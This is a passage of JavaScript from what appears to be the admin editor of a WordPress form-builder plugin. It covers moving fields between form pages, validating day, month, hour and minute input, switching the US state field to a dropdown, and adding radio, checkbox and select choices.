				if(jQuery(wdform_page_and_images.firstChild).is(":visible"))
					break;
									
			}
		
		
			n=wdform_page_and_images.firstChild.childNodes.length;
			
			wdform_page_and_images.firstChild.childNodes[n-2].firstChild.appendChild(wdform_row);
		
			refresh_pages(id);
}

function page_down(id)
{
  event.stopPropagation();
	wdform_field=document.getElementById("wdform_field"+id);
	wdform_row=wdform_field.parentNode;
	wdform_column=wdform_row.parentNode;
	wdform_section=wdform_column.parentNode;
	wdform_page=wdform_section.parentNode;
	wdform_page_and_images=wdform_page.parentNode;
	
			
			while(wdform_page_and_images)
			{			
				wdform_page_and_images=wdform_page_and_images.nextSibling;	
				
							
				if(!wdform_page_and_images)
				{
					alert('Unable to move');
					return;
				}
					
				if(jQuery(wdform_page_and_images.firstChild).is(":visible"))
					break;									
			}
			
			wdform_page_and_images.firstChild.firstChild.firstChild.insertBefore(wdform_row, wdform_page_and_images.firstChild.firstChild.firstChild.firstChild);
			refresh_pages(id);

}

function remove_whitespace(node)
{
var ttt;
	for (ttt=0; ttt < node.childNodes.length; ttt++)
	{
        if( node.childNodes[ttt] && node.childNodes[ttt].nodeType == '3' && !/\S/.test(  node.childNodes[ttt].nodeValue ))
		{
			
			node.removeChild(node.childNodes[ttt]);
			 ttt--;
		}
		else
		{
			if(node.childNodes[ttt].childNodes.length)
				remove_whitespace(node.childNodes[ttt]);
		}
	}
	return
}

function Disable()
{	
	select_=document.getElementById('sel_el_pos');
	select_.setAttribute("disabled", "disabled");
	select_.innerHTML="";
}

function Enable()
{
	var pos=document.getElementsByName("el_pos");
			pos[0].setAttribute("checked", "checked");

	select_ = document.getElementById('sel_el_pos');
	select_.innerHTML="";
	
		for(k=1;k<=form_view_max;k++)
		if(document.getElementById('form_id_tempform_view'+k))
		{
			wdform_page=document.getElementById('form_id_tempform_view'+k);
			remove_whitespace(wdform_page);			
			n=wdform_page.childNodes.length-2;

			for(z=0;z<=n;z++)
			{
					if(!wdform_page.childNodes[z].getAttribute("wdid"))
					{
						wdform_section=wdform_page.childNodes[z];						
						for (x=0; x < wdform_section.childNodes.length; x++)
						{
							wdform_column=wdform_section.childNodes[x];																					
							
							if(wdform_column.firstChild)
							for (y=0; y < wdform_column.childNodes.length; y++)
							{	
								wdform_row=wdform_column.childNodes[y];
								wdid=wdform_row.getAttribute("wdid");
								
								if(wdid)
								{
								var option = document.createElement('option');
										option.setAttribute("id", wdid+"_sel_el_pos");
										option.setAttribute("value", wdid);
									option.innerHTML=document.getElementById( wdid+'_element_labelform_id_temp').innerHTML;	
								select_.appendChild(option);
								}
							}
						}
					}
			}
		}

	select_.removeAttribute("disabled");
}

function change_before()
{
	at_the_end=document.getElementById('pos_end');
	at_the_end.removeAttribute("checked");
	
	select_=document.getElementById('pos_before');
		select_.setAttribute("checked", "checked");
		select_.checked = true;
}


function all_labels()
{
	labels=new Array();
	for(k=1;k<=form_view_max;k++)
		if(document.getElementById('form_id_tempform_view'+k))
		{
			wdform_page=document.getElementById('form_id_tempform_view'+k);
			remove_whitespace(wdform_page);
			n=wdform_page.childNodes.length-2;	
			for(z=0;z<=n;z++)
			{
				if(!wdform_page.childNodes[z].getAttribute("wdid"))
				{
					wdform_section=wdform_page.childNodes[z];				
					for (x=0; x < wdform_section.childNodes.length; x++)
					{
						wdform_column=wdform_section.childNodes[x];
						if(wdform_column.firstChild)
						for (y=0; y < wdform_column.childNodes.length; y++)
						{
							wdform_row=wdform_column.childNodes[y];
							if(wdform_row.nodeType==3)
								continue;
							wdid=wdform_row.getAttribute("wdid");
							if(!wdid)
								continue;

							labels.push( document.getElementById( wdid+'_element_labelform_id_temp').innerHTML);
						}
					}
				}
			}
		}
	
	return labels;
}

function set_checked(id,j)
{
	checking=document.getElementById(id+"_elementform_id_temp"+j);
	if(checking.checked)
		checking.setAttribute("checked", "checked");
	if(!checking.checked)
	{
		checking.removeAttribute("checked");
		if(checking.getAttribute('other'))
			if(checking.getAttribute('other')==1)
			{
				if(document.getElementById(id+"_other_inputform_id_temp"))
				{
					document.getElementById(id+"_other_inputform_id_temp").parentNode.removeChild(document.getElementById(id+"_other_brform_id_temp"));
					document.getElementById(id+"_other_inputform_id_temp").parentNode.removeChild(document.getElementById(id+"_other_inputform_id_temp"));
				}
				return false;
			}
	}
	return true;
}

function set_default(id, j)
{
	for(k=0; k<100; k++)
		if(document.getElementById(id+"_elementform_id_temp"+k))
			if(!document.getElementById(id+"_elementform_id_temp"+k).checked)
				document.getElementById(id+"_elementform_id_temp"+k).removeAttribute("checked");
			else
				document.getElementById(id+"_elementform_id_temp"+j).setAttribute("checked", "checked");
	
	if(document.getElementById(id+"_other_inputform_id_temp"))
	{
		document.getElementById(id+"_other_inputform_id_temp").parentNode.removeChild(document.getElementById(id+"_other_brform_id_temp"));
		document.getElementById(id+"_other_inputform_id_temp").parentNode.removeChild(document.getElementById(id+"_other_inputform_id_temp"));
	}
}

function set_select(select_)
{
	for (p = select_.length - 1; p>=0; p--) 
	    if (select_.options[p].selected) 
		select_.options[p].setAttribute("selected", "selected");
	    else
  		select_.options[p].removeAttribute("selected");
}

function add_0(id)
{
	input=document.getElementById(id);
	if(input.value.length==1)
	{
		input.value='0'+input.value;
		input.setAttribute("value", input.value);
	}
}

function change_hour(ev, id, hour_interval)
{
	if(check_hour(ev, id, hour_interval))
	{
		input=document.getElementById(id);
		input.setAttribute("value", input.value);
	}
}

function change_minute(ev, id)
{
	if(check_minute(ev, id))
	{
		input=document.getElementById(id);
		input.setAttribute("value", input.value);
	}
}

function change_second(ev, id)
{
	if(check_second(ev, id))
	{
		input=document.getElementById(id);
		input.setAttribute("value", input.value);
	}
}

function check_hour(e, id, hour_interval)
{
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	hour=""+document.getElementById(id).value+String.fromCharCode(chCode1);

	hour=parseFloat(hour);
	if((hour<0) || (hour>hour_interval))
        	return false;
	return true;
} 

function check_minute(e, id)
{	
		
	
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	minute=""+document.getElementById(id).value+String.fromCharCode(chCode1);

	minute=parseFloat(minute);
	if((minute<0) || (minute>59))
        	return false;
	return true;
} 

function check_second(e, id)
{	
		
	
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	second=""+document.getElementById(id).value+String.fromCharCode(chCode1);

	second=parseFloat(second);
	if((second<0) || (second>59))
        	return false;
	return true;
} 

function change_day(ev, id)
{
	if(check_day(ev, id))
	{
		input=document.getElementById(id);
		input.setAttribute("value", input.value);
	}
}

function change_month(ev, id)
{
	if(check_month(ev, id))
	{
		input=document.getElementById(id);
		input.setAttribute("value", input.value);
	}
}

function change_year(id)
{
	year=document.getElementById(id).value;
	
	from=parseFloat(document.getElementById(id).getAttribute('from'));
	to=parseFloat(document.getElementById(id).getAttribute('to'));
	
	year=parseFloat(year);
	
	if((year>=from) && (year<=to))
		document.getElementById(id).setAttribute("value", year);
	else
		document.getElementById(id).setAttribute("value", '');
}

function check_day(e, id)
{	
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	day=""+document.getElementById(id).value+String.fromCharCode(chCode1);

	if(day.length>2)
        	return false;
			
	if(day=='00')
        	return false;
			
	day=parseFloat(day);
	if((day<0) || (day>31))
        	return false;
	return true;
} 

function check_month(e, id)
{	
		
	
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;
	month=""+document.getElementById(id).value+String.fromCharCode(chCode1);
	
	if(month.length>2)
        	return false;
			
	if(month=='00')
        	return false;
			
	month=parseFloat(month);
	if((month<0) || (month>12))
        	return false;
	return true;
} 

function check_year2(id)
{
	year=document.getElementById(id).value;
	
	from=parseFloat(document.getElementById(id).getAttribute('from'));
	
	year=parseFloat(year);
	
	if(year<from)
	{
		document.getElementById(id).value='';
		alert('The value of "year" is not valid.');
	}
}

function check_year1(e, id)
{	
   	var chCode1 = e.which || e.keyCode;
    	if (chCode1 > 31 && (chCode1 < 48 || chCode1 > 57))
        return false;

	year=""+document.getElementById(id).value+String.fromCharCode(chCode1);
	
	to=parseFloat(document.getElementById(id).getAttribute('to'));
	
	year=parseFloat(year);
	
	if(year>to)
        	return false;
	return true;
} 

function label_top(num)
{	
	document.getElementById(num+'_label_sectionform_id_temp').style.display="block";
	document.getElementById(num+'_element_sectionform_id_temp').style.display="block";
}

function label_left(num)
{
	document.getElementById(num+'_label_sectionform_id_temp').style.display="table-cell";
	document.getElementById(num+'_element_sectionform_id_temp').style.display="table-cell";
}

function delete_value(id)
{
	ofontStyle=document.getElementById(id).className;
	if(ofontStyle=="input_deactive")
	{
		document.getElementById(id).value="";
		destroyChildren(document.getElementById(id));
		document.getElementById(id).setAttribute("class", "input_active");
		document.getElementById(id).className='input_active';
	}
}


function return_value(id)
{
	input=document.getElementById(id);
	if(input.value=="")
	{
		input.value=input.title;
		input.className='input_deactive';
		input.setAttribute("class", 'input_deactive');
	}
}

function change_state_input(id,form_id)
{

	if((document.getElementById(id+"_country"+form_id) && document.getElementById(id+"_country"+form_id).value=="United States" && document.getElementById(id+"_disable_fieldsform_id_temp").getAttribute('us_states')=='yes') || (document.getElementById(id+"_disable_fieldsform_id_temp").getAttribute('country')=='yes' && document.getElementById(id+"_disable_fieldsform_id_temp").getAttribute('us_states')=='yes'))
	{	

		state_input=document.getElementById(id+"_state"+form_id);
		
		
		var state = document.createElement('select');
			state.setAttribute("type", 'text');
			state.style.cssText = "width:100%";
			state.setAttribute("id", id+"_state"+form_id);
			state.setAttribute("name", (parseInt(id)+3)+"_state"+form_id);
			state.setAttribute("onChange", "change_value('"+id+"_state"+form_id+"')");

	
		
		var option_ = document.createElement('option');
			option_.setAttribute("value", "");
			option_.innerHTML="";
		state.appendChild(option_);
		
		states=["Alabama","Alaska", "Arizona","Arkansas","California","Colorado","Connecticut","Delaware","District Of Columbia","Florida","Georgia","Hawaii","Idaho","Illinois","Indiana","Iowa","Kansas","Kentucky","Louisiana","Maine","Maryland","Massachusetts","Michigan","Minnesota","Mississippi","Missouri","Montana","Nebraska","Nevada","New Hampshire","New Jersey","New Mexico","New York","North Carolina","North Dakota","Ohio","Oklahoma","Oregon","Pennsylvania","Rhode Island","South Carolina","South Dakota","Tennessee","Texas","Utah","Vermont","Virginia","Washington","West Virginia","Wisconsin","Wyoming"];	
		for(r=0;r<states.length;r++)
		{
		var option_ = document.createElement('option');
			option_.setAttribute("value", states[r]);
			option_.innerHTML=states[r];
		state.appendChild(option_);
		}
		
		var state_input_parent = state_input.parentNode;
		state_input_parent.removeChild(state_input);
		state_input_parent.insertBefore(state,state_input_parent.firstChild);

	}
	else
	{

		if(document.getElementById(id+"_state"+form_id).tagName=='SELECT')
		{
				
				var state_input = document.createElement('input');
					state_input.setAttribute("type", 'text');
					state_input.style.cssText = "width:100%";
					state_input.setAttribute("id", id+"_state"+form_id);
					state_input.setAttribute("name", (parseInt(id)+3)+"_state"+form_id);
					state_input.setAttribute("onChange", "change_value('"+id+"_state"+form_id+"')");
									
					
					state = document.getElementById(id+"_state"+form_id);
					
					var state_parent = state.parentNode;
						state_parent.removeChild(state);
						state_parent.insertBefore(state_input,state_parent.firstChild);
					
		}
	
	}


}

function change_value(id)
{
	input=document.getElementById(id);
	 
	tag=input.tagName;
	if(tag=="TEXTAREA")
	{
// destroyChildren(input)
	input.innerHTML=input.value;
	}
	else
	input.setAttribute("value", input.value);

}

function change_input_value(first_value, id)
{	
	input=document.getElementById(id);
	input.title=first_value;
	
if( window.getComputedStyle ) 
{
  ofontStyle = window.getComputedStyle(input,null).fontStyle;
} else if( input.currentStyle ) {
  ofontStyle = input.currentStyle.fontStyle;
}
	if(ofontStyle=="italic")
	{	
		input.value=first_value;
		input.setAttribute("value", first_value);
	}
}

function change_file_value(destination, id, prefix , postfix )
{	
	if(typeof(prefix)=='undefined') {prefix=''; postfix=''};
	input=document.getElementById(id);
	input.value=prefix+destination+postfix;
	input.setAttribute("value", prefix+destination+postfix);
	
}

function close_window() {
  if (need_enable) {
    enable();
  }
	need_enable = true;
  document.getElementById('edit_table').innerHTML = "";
  document.getElementById('show_table').innerHTML = "";
  document.getElementById('main_editor').style.display = "none";
  if (document.getElementById("form_maker_editor_ifr")) {
    ifr_id = "form_maker_editor_ifr";
    ifr = getIFrameDocument(ifr_id);
    ifr.body.innerHTML = "";
  }
  document.getElementById('form_maker_editor').value="";
  document.getElementById('editing_id').value="";
  document.getElementById('element_type').value="";
	alltypes=Array('customHTML','text','checkbox','radio','time_and_date','select','file_upload','captcha','map','button','page_break','section_break','paypal','survey');
	for (x = 0; x < 14; x++) {
		document.getElementById('img_'+alltypes[x]).parentNode.style.backgroundColor = "";
	}
}

function change_label(id, label) {
  label = label.replace(/(<([^>]+)>)/ig, "");
	document.getElementById(id).innerHTML = label;
	document.getElementById(id).value = label;
}

function change_label_name(num, id, label, type)
{
	jQuery('#'+id).html(label);
	if(!jQuery('#el_disable_value').prop('checked'))
	{
		if(!jQuery('#el_choices'+num).attr('other'))
			jQuery('#el_option_value'+num).val(label);		
		if(type=='select')
			jQuery('#'+id).val(label);	
	}
}

function change_label_name_on_paste(num, id, label, type)
{
	setTimeout(function(){
		label = elem.value;
		jQuery('#'+id).html(label);
		if(!jQuery('#el_disable_value').prop('checked'))
		{
			if(!jQuery('#el_choices'+num).attr('other'))
				jQuery('#el_option_value'+num).val(label);		
			if(type=='select')
				jQuery('#'+id).val(label);	
		}  
    }, 100);
}

function change_label_value(id, label)
{
	document.getElementById(id).value=label;	
}

function change_label_value_on_paste(id, elem)
{
	setTimeout(function(){
		label = elem.value;
		document.getElementById(id).value=label;	
    }, 100);
}


function change_label_1(id, label) {
	document.getElementById(id).value = label;
}

function change_label_price(id, label) {
	document.getElementById(id).innerHTML = label;
}

function change_value_price(id, label) {
	document.getElementById(id).value = label;
}

function change_func(id, label) {
	document.getElementById(id).setAttribute("onclick", label);
}

function change_in_value(id, label) {
  label = label.replace(/(<([^>]+)>)/ig, "");
  label = label.replace(/"/g, "&quot;");
	document.getElementById(id).setAttribute("value", label);
}

function change_size(size, num) {
	document.getElementById(num+'_elementform_id_temp').style.width=size+'px';
	if (document.getElementById(num+'_element_input')) {
		document.getElementById(num+'_element_input').style.width=size+'px';
  }
	switch(size) {
		case '111':
		{
			document.getElementById(num+'_elementform_id_temp').setAttribute("rows", "2"); break;
		}
		case '222':
		{
			document.getElementById(num+'_elementform_id_temp').setAttribute("rows", "4");break;
		}
		case '444':
		{
			document.getElementById(num+'_elementform_id_temp').setAttribute("rows", "8");break;
		}
	}
}

function add_choise_price(type, num)
{
var q=0;
	if(document.getElementById(num+'_hor'))
	{
		q=1;
		flow_ver(num);
	}
	var max_value = 0;
	jQuery('.change_pos').each(function() {
			var value = parseInt(jQuery(this)[0].id);
			max_value = (value > max_value) ? value : max_value;
		});

	max_value = max_value + 1;	
	if(type=='radio' || type=='checkbox')
	{
		element='input';
	
		var table = document.getElementById(num+'_table_little');
		var tr = document.createElement('div');
			tr.setAttribute("id", num+"_element_tr"+max_value);
			tr.style.display="table-row";
		var td = document.createElement('div');
			td.setAttribute("valign", "top");
			td.setAttribute("id", num+"_td_little"+max_value);
			td.setAttribute("idi", max_value);
			td.style.display="table-cell";
		
		var adding = document.createElement(element);
			adding.setAttribute("type", type);
			adding.setAttribute("value", "");
			adding.setAttribute("id", num+"_elementform_id_temp"+max_value);
			if(document.getElementById(num+"_option_left_right").value=="right")
				adding.style.cssText = "float: left !important";
		if(type=='checkbox')
		{	
			adding.setAttribute("onClick", "set_checked('"+num+"','"+max_value+"','form_id_temp')");
			adding.setAttribute("name", num+"_elementform_id_temp"+max_value);
		}
			
		if(type=='radio')
		{
			adding.setAttribute("onClick", "set_default('"+num+"','"+max_value+"','form_id_temp')");
			adding.setAttribute("name", num+"_elementform_id_temp");
		}
		
		
		var label_adding = document.createElement('label');
			label_adding.setAttribute("id", num+"_label_element"+max_value);
			label_adding.setAttribute("class", "ch-rad-label");
			label_adding.setAttribute("for",num+"_elementform_id_temp"+max_value);
			if(document.getElementById(num+"_option_left_right").value=="right")
				label_adding.style.cssText = "float: none !important";
			
		var adding_ch_label = document.createElement('input');
				adding_ch_label.setAttribute("type", "hidden");
				adding_ch_label.setAttribute("id", num+"_elementlabel_form_id_temp"+max_value);
				adding_ch_label.setAttribute("name", num+"_elementform_id_temp"+max_value+"_label");
				adding_ch_label.setAttribute("value", "");
			
		    td.appendChild(adding);
		    td.appendChild(label_adding);
		    td.appendChild(adding_ch_label);
		    tr.appendChild(td);
		    table.appendChild(tr);
		
		var choices_td= document.getElementById('choices');
		var div = document.createElement('div');
			div.setAttribute("id", max_value);
			div.setAttribute("class", "change_pos");
		var el_choices = document.createElement('input');
			el_choices.setAttribute("id", "el_choices"+max_value);
			el_choices.setAttribute("type", "text");
			el_choices.setAttribute("class", "fm-field-choice");
			el_choices.setAttribute("value", "");
			el_choices.setAttribute("onKeyUp", "change_label('"+num+"_label_element"+max_value+"', this.value); change_label_1('"+num+"_elementlabel_form_id_temp"+max_value+"', this.value); ");
	
		var el_choices_remove = document.createElement('img');
			el_choices_remove.setAttribute("id", "el_choices"+max_value+"_remove");
			el_choices_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_choices_remove.style.cssText =  'cursor:pointer;vertical-align:middle; margin:2px;';
			el_choices_remove.setAttribute("align", 'top');
			el_choices_remove.setAttribute("onClick", "remove_choise_price('"+max_value+"','"+num+"')");
			
		var el_choices_price = document.createElement('input');
			el_choices_price.setAttribute("id", "el_option_price"+max_value);
			el_choices_price.setAttribute("type", "text");
			el_choices_price.setAttribute("value", '');
			el_choices_price.setAttribute("class", "fm-field-paypal-choice");
			el_choices_price.setAttribute("onKeyUp", "change_value_price('"+num+"_elementform_id_temp"+max_value+"', this.value)");
			el_choices_price.setAttribute("onKeyPress", "return check_isnum_point(event)");
	
	
	    var el_choices_params = document.createElement('input');
			el_choices_params.setAttribute("id", "el_option_params"+max_value);
			el_choices_params.setAttribute("class", "el_option_params");
			el_choices_params.setAttribute("type", "hidden");
			el_choices_params.setAttribute("value", "");
			
		var el_choices_handle = document.createElement('img');
			el_choices_handle.setAttribute("class", "el_choices_sortable");
			el_choices_handle.setAttribute("src", plugin_url + '/images/move_cursor.png?ver=1.8.0');		
			el_choices_handle.style.cssText = 'cursor:move; vertical-align:middle; margin: 2px;';
			el_choices_handle.setAttribute("align", 'top');
		
			div.appendChild(el_choices);
			div.appendChild(el_choices_price);
			div.appendChild(el_choices_remove);
			div.appendChild(el_choices_handle);
			div.appendChild(el_choices_params);
			choices_td.appendChild(div);
		
		if(type=='checkbox')
		{	
			refresh_id_name(num, 'type_checkbox');
		}
			
		if(type=='radio')
		{
			refresh_id_name(num, 'type_radio');
		}
		
    
	refresh_attr(num, 'type_checkbox');
	
	}
	
	if(type=='select')
	{
		var select_ = document.getElementById(num+'_elementform_id_temp');
		var option = document.createElement('option');
			option.setAttribute("id", num+"_option"+max_value);
			
		    select_.appendChild(option);
		
		var choices_td= document.getElementById('choices');
		var div = document.createElement('div');
			div.setAttribute("id", max_value);
			div.setAttribute("class", "change_pos");
		var el_choices = document.createElement('input');
			el_choices.setAttribute("id", "el_option"+max_value);
			el_choices.setAttribute("type", "text");
			el_choices.setAttribute("class", "fm-field-choice");
			el_choices.setAttribute("value", "");
			el_choices.setAttribute("onKeyUp", "change_label_price('"+num+"_option"+max_value+"', this.value)");
			
		var el_choices_price = document.createElement('input');
			el_choices_price.setAttribute("id", "el_option_price"+max_value);
			el_choices_price.setAttribute("type", "text");
			el_choices_price.setAttribute("value", '');
			el_choices_price.setAttribute("class", "fm-field-paypal-choice");
			el_choices_price.setAttribute("onKeyUp", "change_value_price('"+num+"_option"+max_value+"', this.value)");
			el_choices_price.setAttribute("onKeyPress", "return check_isnum_point(event)");
			
	    var el_choices_params = document.createElement('input');
			el_choices_params.setAttribute("id", "el_option_params"+max_value);
			el_choices_params.setAttribute("class", "el_option_params");
			el_choices_params.setAttribute("type", "hidden");
			el_choices_params.setAttribute("value", "");
			
		var el_choices_remove = document.createElement('img');
			el_choices_remove.setAttribute("id", "el_option"+max_value+"_remove");
			el_choices_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px;';
			el_choices_remove.setAttribute("align", 'top');
			el_choices_remove.setAttribute("onClick", "remove_option_price('"+max_value+"','"+num+"')");
			
		var el_choices_dis = document.createElement('input');
			el_choices_dis.setAttribute("type", 'checkbox');
			el_choices_dis.setAttribute("id", "el_option"+max_value+"_dis");
			el_choices_dis.setAttribute("onClick", "dis_option_price('"+num+"','"+max_value+"', this.checked)");
			el_choices_dis.style.cssText ="vertical-align: middle; margin-right:24px; margin-left:24px;";


	    var el_choices_handle = document.createElement('img');
			el_choices_handle.setAttribute("class", "el_choices_sortable");
			el_choices_handle.setAttribute("src", plugin_url + '/images/move_cursor.png?ver=1.8.0');		
			el_choices_handle.style.cssText = 'cursor:move; vertical-align:middle; margin:2px;';
			el_choices_handle.setAttribute("align", 'top');
		
		div.appendChild(el_choices);
		div.appendChild(el_choices_price);
		div.appendChild(el_choices_dis);
		div.appendChild(el_choices_remove);
		div.appendChild(el_choices_handle);
		div.appendChild(el_choices_params);
		choices_td.appendChild(div);	
    }
	if(q==1)
	{
		flow_hor(num);
	}

}

function add_choise(type, num)
{
	var max_value = 0;
	jQuery('.change_pos').each(function() {
			var value = parseInt(jQuery(this)[0].id);
			max_value = (value > max_value) ? value : max_value;
		});

	max_value = max_value + 1;
	if(type=='radio' || type=='checkbox')
	{
		var choices_td= document.getElementById('choices');
	
		var div = document.createElement('div');
			div.setAttribute("id", max_value);
			div.setAttribute("class", "change_pos");
			
		var el_choices = document.createElement('input');
			el_choices.setAttribute("id", "el_choices"+max_value);
			el_choices.setAttribute("type", "text");
			el_choices.setAttribute("class", "fm-field-choice");
			el_choices.setAttribute("value", "");
			el_choices.setAttribute("onKeyUp", "change_label_name('"+max_value+"', '"+num+"_label_element"+max_value+"', this.value, '"+type+"'); change_label_value('"+num+"_elementform_id_temp"+max_value+"', jQuery('#el_option_value"+max_value+"').val())");
			el_choices.setAttribute("onpaste", "elem = this; change_label_name_on_paste('"+max_value+"', '"+num+"_label_element"+max_value+"', '"+type+"'); change_label_value_on_paste('"+num+"_elementform_id_temp"+max_value+"', this)");	
	
		var el_choices_value = document.createElement('input');
			el_choices_value.setAttribute("id", "el_option_value"+max_value);
			el_choices_value.setAttribute("class", "el_option_value fm-field-choice");
			el_choices_value.setAttribute("type", "text");
			el_choices_value.setAttribute("value", "");	
			if(!jQuery('#el_disable_value').prop('checked'))
				el_choices_value.setAttribute("disabled", "disabled");
			el_choices_value.setAttribute("onKeyUp", "change_label_value('"+num+"_elementform_id_temp"+max_value+"', this.value)");
			el_choices_value.setAttribute("onpaste", "change_label_value_on_paste('"+num+"_elementform_id_temp"+max_value+"', this)");
	
		var el_choices_remove = document.createElement('img');
			el_choices_remove.setAttribute("id", "el_choices"+max_value+"_remove");
			el_choices_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_choices_remove.style.cssText =  'cursor:pointer;vertical-align:middle; margin:2px;';
			el_choices_remove.setAttribute("align", 'top');
			el_choices_remove.setAttribute("onClick", "remove_choise('"+max_value+"','"+num+"','"+type+"')");
		
		var el_choices_handle = document.createElement('img');
			el_choices_handle.setAttribute("class", "el_choices_sortable");
			el_choices_handle.setAttribute("src", plugin_url + '/images/move_cursor.png?ver=1.8.0');		
			el_choices_handle.style.cssText = 'cursor:move; vertical-align:middle; margin:2px;';
			el_choices_handle.setAttribute("align", 'top');
		
			div.appendChild(el_choices);
			div.appendChild(el_choices_value);
			div.appendChild(el_choices_remove);
			div.appendChild(el_choices_handle);
			choices_td.appendChild(div);
		
		refresh_rowcol(num, type);
		
		
		if(type=='checkbox')
		{	
			refresh_id_name(num, 'type_checkbox');
			refresh_attr(num, 'type_checkbox');
		}
			
		if(type=='radio')
		{
			refresh_id_name(num, 'type_radio');
			refresh_attr(num, 'type_radio');
		}

	}
	
	if(type=='select')
	{
		var select_ = document.getElementById(num+'_elementform_id_temp');
		var option = document.createElement('option');
			option.setAttribute("id", num+"_option"+max_value);
			
		    select_.appendChild(option);
		
		var choices_td= document.getElementById('choices');
		
		var div = document.createElement('div');
			div.setAttribute("id", max_value);
			div.setAttribute("class", "change_pos");
			
		var el_choices = document.createElement('input');
			el_choices.setAttribute("id", "el_option"+max_value);
			el_choices.setAttribute("type", "text");
			el_choices.setAttribute("class", "fm-field-choice");
			el_choices.setAttribute("value", "");
			el_choices.setAttribute("onKeyUp", "change_label_name('"+max_value+"', '"+num+"_option"+max_value+"', this.value, 'select')");
			el_choices.setAttribute("onpaste", "elem = this; change_label_name_on_paste('"+max_value+"', '"+num+"_option"+max_value+"', 'select')");
			
		var el_choices_remove = document.createElement('img');
			el_choices_remove.setAttribute("id", "el_option"+max_value+"_remove");
			el_choices_remove.setAttribute("src", plugin_url + '/images/delete.png?ver=1.8.0');
			el_choices_remove.style.cssText = 'cursor:pointer; vertical-align:middle; margin:2px;';
			el_choices_remove.setAttribute("align", 'top');
			el_choices_remove.setAttribute("onClick", "remove_option('"+max_value+"','"+num+"')");
			
		var el_choices_value = document.createElement('input');
			el_choices_value.setAttribute("id", "el_option_value"+max_value);
			el_choices_value.setAttribute("class", "el_option_value fm-field-choice");
			el_choices_value.setAttribute("type", "text");
			el_choices_value.setAttribute("value", "");	
			if(!jQuery('#el_disable_value').prop('checked'))
				el_choices_value.setAttribute("disabled", "disabled");
			el_choices_value.setAttribute("onKeyUp", "change_label_value('"+num+"_option"+max_value+"', this.value)");
			el_choices_value.setAttribute("onpaste", "change_label_value_on_paste('"+num+"_option"+max_value+"', this)");
			
		var el_choices_dis = document.createElement('input');
			el_choices_dis.setAttribute("type", 'checkbox');
			el_choices_dis.setAttribute("id", "el_option"+max_value+"_dis");
			el_choices_dis.setAttribute("class", "el_option_dis");
			el_choices_dis.setAttribute("onClick", "dis_option('"+num+"_option"+max_value+"', this.checked, '"+j+"')");
			el_choices_dis.style.cssText ="vertical-align: middle; margin-left:21px; margin-right:21px;";			
			if(jQuery('#el_disable_value').prop('checked'))
				el_choices_dis.setAttribute("disabled", "disabled");
				
		var el_choices_params = document.createElement('input');
			el_choices_params.setAttribute("id", "el_option_params"+max_value);
			el_choices_params.setAttribute("class", "el_option_params");
			el_choices_params.setAttribute("type", "hidden");
			el_choices_params.setAttribute("value", "");

		var el_choices_handle = document.createElement('img');
			el_choices_handle.setAttribute("class", "el_choices_sortable");
			el_choices_handle.setAttribute("src", plugin_url + '/images/move_cursor.png?ver=1.8.0');		
			el_choices_handle.style.cssText = 'cursor:move; vertical-align:middle; margin:2px';
			el_choices_handle.setAttribute("align", 'top');
		
		div.appendChild(el_choices);
		div.appendChild(el_choices_value);
		div.appendChild(el_choices_dis);
		div.appendChild(el_choices_remove);
		div.appendChild(el_choices_handle);
		div.appendChild(el_choices_params);
		choices_td.appendChild(div);

    }


}

function refresh_rowcol(num, type)
{
	if(!document.getElementById('edit_for_rowcol').value)
		document.getElementById('edit_for_rowcol').value =1;
		
		document.getElementById(num+'_rowcol_numform_id_temp').value = document.getElementById('edit_for_rowcol').value;

		var table = document.getElementById(num+'_table_little');
			table.removeAttribute("for_hor");
			table.innerHTML="";

		choeices = jQuery('.change_pos').length;	
		if(document.getElementById('edit_for_flow_vertical').checked==true)
		{
			var columns = document.getElementById('edit_for_rowcol').value;		
			var rows = parseInt((choeices+1)/columns);
			
			var gago=0;
			var vaxo=1;
				
			tr_row = document.createElement('div');
			tr_row.setAttribute("id", num+"_element_tr0");
			tr_row.style.display = 'table-row';
					
			jQuery('.change_pos').each(function() {
				var index = jQuery(this)[0].id;
				
				if(gago >= columns)
				{  
					gago=0;
					tr_row = document.createElement('div');
					tr_row.setAttribute("id", num+"_element_tr"+vaxo);
					tr_row.style.display = 'table-row';								
					
					vaxo++;
				}
				
				var td = document.createElement('div');
					td.setAttribute("valign", "top");
					td.setAttribute("id", num+"_td_little"+index);
					td.setAttribute("idi", index);
					td.style.display = 'table-cell';	

				var adding = document.createElement('input');
					adding.setAttribute("type", type);
					adding.setAttribute("id", num+"_elementform_id_temp"+index);					
					if(jQuery(this).find('#el_choices'+index)[0].getAttribute("checked")=="true")
						adding.setAttribute("checked", "checked");	
					if(document.getElementById(num+"_option_left_right").value=="right")
						adding.style.cssText = "float: left !important";		
						
				if(type=='checkbox')
				{
					adding.setAttribute("name", num+"_elementform_id_temp"+index);
					if(document.getElementById(num+"_allow_otherform_id_temp").value=="yes" && jQuery(this).find('#el_choices'+index).attr("other")=='1')
					{
						adding.setAttribute("value", "");	
						adding.setAttribute("other", "1");
						adding.setAttribute("onclick", "if(set_checked('"+num+"','"+index+"','form_id_temp')) show_other_input('"+num+"','form_id_temp');");
					}
					else
					{
						if(document.getElementById(num+"_value_disabledform_id_temp").value=="no")
							adding.setAttribute("value", jQuery(this).find('#el_choices'+index).val());	
						else
							adding.setAttribute("value", jQuery(this).find('#el_option_value'+index).val());	
						adding.setAttribute("onclick", "set_checked('"+num+"','"+index+"','form_id_temp')");
					}	
						
				}
					
				if(type=='radio')
				{
					adding.setAttribute("name", num+"_elementform_id_temp");
					if(document.getElementById(num+"_allow_otherform_id_temp").value=="yes" && jQuery(this).find('#el_choices'+index).attr("other")=='1')
					{
						adding.setAttribute("value", "");
